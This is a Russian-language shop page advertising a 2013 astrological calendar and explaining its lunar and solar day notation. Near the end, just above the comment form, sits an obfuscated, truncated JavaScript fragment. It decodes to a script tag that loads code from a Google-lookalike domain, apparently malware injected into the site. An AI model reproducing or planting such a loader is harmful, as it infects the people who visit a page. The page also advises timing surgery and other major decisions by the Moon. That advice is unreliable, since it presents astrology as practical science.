Астрокалендарь Осипенко на 2013 годФормат: 60x90/8
Издательство: Осипенко
Переплёт: мягкий
Год издания: 2012
Стр: 45
Цена : см. прайс-лист

Магический магазин “Мистическая Гирлянда” представляет Вам календарь Осипенко ”Астрокалендарь на 2013 год”

От авторов: Мы издаем лунно-солнечный ежегодный научно-популярный журнал "Астрологический календарь для Украины". В 2013 году выпуск будет юбилейный - 10-й. Он полезен в работе астрологам и психологам, врачам и народным целителям, предпринимателям и государственным служащим, бизнес-леди и "отчаянным домохозяйкам". Календарь - это карта дорог, которая поможет достигать своих целей быстрее и эффективнее, указывающая кратчайший путь в собственной реализации. Имея в руках такую карту, вы можете продвигаться по своему жизненному пути с наименьшими затратами энергии и времени и быть хозяевами своей жизни, а не марионетками в руках Судьбы.

В нашем календаре вы найдете время начала солнечных и лунных дней, периоды растущей и стареющей Луны, периоды новолуний, полнолуний и затмений, периоды прохождения Луны и Солнца по знакам Зодиака. Эта информация даст вам возможность упорядочить вашу жизнь, сделать ее более осмысленной и наполненной. Вы сможете самостоятельно выбрать наиболее благоприятное время для начала и завершения важных дел, дорогостоящих приобретений, хирургических операций, бракосочетаний и других важных событий вашей жизни.

Календарь 2013-1

Слева в ячейке показана информация о положении Луны, справа - Солнца. В нашем примере 30-й лунный день начнется 15 января в 7 ч. 56 м. с восходом Луны, а 1-й лунный день начинается в 9 ч. 11 м. в момент новолуния, который совпадает с моментом Солнечного затмения.

Луна переходит в знак Водолея в 19 ч. 16 м. Информация о прохождении Луны по знакам Зодиака дополнит картину каждого дня.

1-й солнечный день начнется с восходом Солнца в 7 ч. 53 м. Солнце входит в 26-й градус Козерога в 8 ч. 39 м.

В нижнем сегменте ячейки, желтыми буквами на фиолетовом фоне - период Луны без курса. Это неблагоприятное время для начала важных дел, когда следует быть особенно внимательным и собранным, особенно за рулем. В нашем примере период Луны без курса  длится с 11 ч. 04 м. до 19 ч. 15 м.

Важными периодами в лунном месяце являются моменты смены фаз Луны. Они также сложны в психологическом плане и неблагоприятны для социальной активности, но лучше всего подходят для духовной работы. В ячейках эти дни обозначены следующими символами:

Календарь 2013-2

Из приведенной схемы видно, что солнечное затмение является частным случаем новолуния, а лунное затмение - полнолуния. Растущая Луна, от новолуния до полнолуния - это цикл расширения, а стареющая Луна - это цикл сжатия. Поэтому начинать дела лучше на растущей Луне, а завершать на стареющей.

Приобрести данный астрокалендарь Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>